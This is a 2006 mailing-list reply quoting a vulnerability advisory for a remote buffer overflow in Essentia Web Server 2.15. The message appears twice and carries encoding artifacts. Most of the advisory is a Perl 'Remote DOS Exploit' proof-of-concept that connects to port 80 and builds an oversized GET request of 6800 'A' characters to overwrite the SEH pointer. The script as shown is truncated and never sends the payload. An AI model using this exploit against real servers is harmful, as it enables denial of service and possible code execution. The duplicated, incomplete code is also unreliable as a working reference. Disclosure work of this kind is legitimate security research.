Noam Rathaus
16/11/06, 02:41
Hi,
Very old news, http://www.securiteam.com/windowsntfocus/5QP0R156AC.html,=20
apparently it was never patched by the vendor.
On Friday 10 November 2006 18:57, corrado.liotta@alice.it wrote:
> -=3D[--------------------ADVISORY-------------------]=3D-
>
> Essentia Web Server V 2.15
>
> Author:CorryL x0n3-h4ck.org
> -=3D[-----------------------------------------------]=3D-
>
>
> -=3D[+] Application: Essentia Web Server
> -=3D[+] Version: 2.15
> -=3D[+] Vendor's URL: http://www.essencomp.com
> -=3D[+] Platform: Windows
> -=3D[+] Bug type: Buffer overflow
> -=3D[+] Exploitation: Remote
> -=3D[-]
> -=3D[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
> -=3D[+] Reference: www.x0n3-h4ck.org
> -=3D[+] Virtual Office: http://www.kasamba.com/CorryL
>
> ..::[ Descriprion ]::..
>
> Providing enhanced Web Application and Communication Services, this is a
> high performance scalable web server that supports thousands of virtual
> servers.
>
> ..::[ Bug ]::..
>
> This software is affection from a buffer overflow
> what it would allow an attacker to perform arbitrary code
> on the system victim.
> Sending a GET+Ax6800 request, he would succeed
> to write above the seh point.
>
> ..::[ Proof Of Concept ]::..
>
> #!/usr/bin/perl
>
>
> use IO::Socket;
>
> use Getopt::Std; getopts('h:', \%args);
>
>
>
> if (defined($args{'h'})) { $host =3D $args{'h'}; }
>
> print STDERR "\n-=3D[ Essentia Web Server 2.15 Remote DOS Exploit]=3D-\n";
>
> print STDERR "-=3D[ Discovered By CorryL corryl80@gmail.com ]=3D=
=2D\n";
>
> print STDERR "-=3D[ Coded by CorryL info:www.x0n3-h4ck.org ]=3D-\n\n";
>
> if (!defined($host)) {
>
> Usage();
>
> }
>
> $dos =3D "A"x6800;
>
> print "[+] Connect to $host\n";
>
> $socket =3D new IO::Socket::INET (PeerAddr =3D> "$host",
>
> PeerPort =3D> 80,
>
> Proto =3D> 'tcp');
>
> die unless $socket;
>
> print "[+] Sending DOS byte\n";
>
> $data =3D "GET /$dos \r\n\r\n";
>
>
> ..::[ Workaround ]::..
>
> nothing
>
> ..::[ Disclousure Timeline ]::..
>
> [30/10/2006] - Vendor notification
> [04/11/2006] =96 No Vendor Response
> [04/11/2006] - Public disclousure
=2D-=20
=C2=A0 Noam Rathaus
=C2=A0 CTO
=C2=A0 1616 Anderson Rd.
=C2=A0 McLean, VA 22102
=C2=A0 Tel: 703.286.7725 extension 105
=C2=A0 Fax: 888.667.7740
=C2=A0 noamr@beyondsecurity.com
=C2=A0 http://www.beyondsecurity.com
Very old news, http://www.securiteam.com/windowsntfocus/5QP0R156AC.html,=20
apparently it was never patched by the vendor.
On Friday 10 November 2006 18:57, corrado.liotta@alice.it wrote:
> -=3D[--------------------ADVISORY-------------------]=3D-
>
> Essentia Web Server V 2.15
>
> Author:CorryL x0n3-h4ck.org
> -=3D[-----------------------------------------------]=3D-
>
>
> -=3D[+] Application: Essentia Web Server
> -=3D[+] Version: 2.15
> -=3D[+] Vendor's URL: http://www.essencomp.com
> -=3D[+] Platform: Windows
> -=3D[+] Bug type: Buffer overflow
> -=3D[+] Exploitation: Remote
> -=3D[-]
> -=3D[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
> -=3D[+] Reference: www.x0n3-h4ck.org
> -=3D[+] Virtual Office: http://www.kasamba.com/CorryL
>
> ..::[ Descriprion ]::..
>
> Providing enhanced Web Application and Communication Services, this is a
> high performance scalable web server that supports thousands of virtual
> servers.
>
> ..::[ Bug ]::..
>
> This software is affection from a buffer overflow
> what it would allow an attacker to perform arbitrary code
> on the system victim.
> Sending a GET+Ax6800 request, he would succeed
> to write above the seh point.
>
> ..::[ Proof Of Concept ]::..
>
> #!/usr/bin/perl
>
>
> use IO::Socket;
>
> use Getopt::Std; getopts('h:', \%args);
>
>
>
> if (defined($args{'h'})) { $host =3D $args{'h'}; }
>
> print STDERR "\n-=3D[ Essentia Web Server 2.15 Remote DOS Exploit]=3D-\n";
>
> print STDERR "-=3D[ Discovered By CorryL corryl80@gmail.com ]=3D=
=2D\n";
>
> print STDERR "-=3D[ Coded by CorryL info:www.x0n3-h4ck.org ]=3D-\n\n";
>
> if (!defined($host)) {
>
> Usage();
>
> }
>
> $dos =3D "A"x6800;
>
> print "[+] Connect to $host\n";
>
> $socket =3D new IO::Socket::INET (PeerAddr =3D> "$host",
>
> PeerPort =3D> 80,
>
> Proto =3D> 'tcp');
>
> die unless $socket;
>
> print "[+] Sending DOS byte\n";
>
> $data =3D "GET /$dos \r\n\r\n";
>
>
> ..::[ Workaround ]::..
>
> nothing
>
> ..::[ Disclousure Timeline ]::..
>
> [30/10/2006] - Vendor notification
> [04/11/2006] =96 No Vendor Response
> [04/11/2006] - Public disclousure
=2D-=20
=C2=A0 Noam Rathaus
=C2=A0 CTO
=C2=A0 1616 Anderson Rd.
=C2=A0 McLean, VA 22102
=C2=A0 Tel: 703.286.7725 extension 105
=C2=A0 Fax: 888.667.7740
=C2=A0 noamr@beyondsecurity.com
=C2=A0 http://www.beyondsecurity.com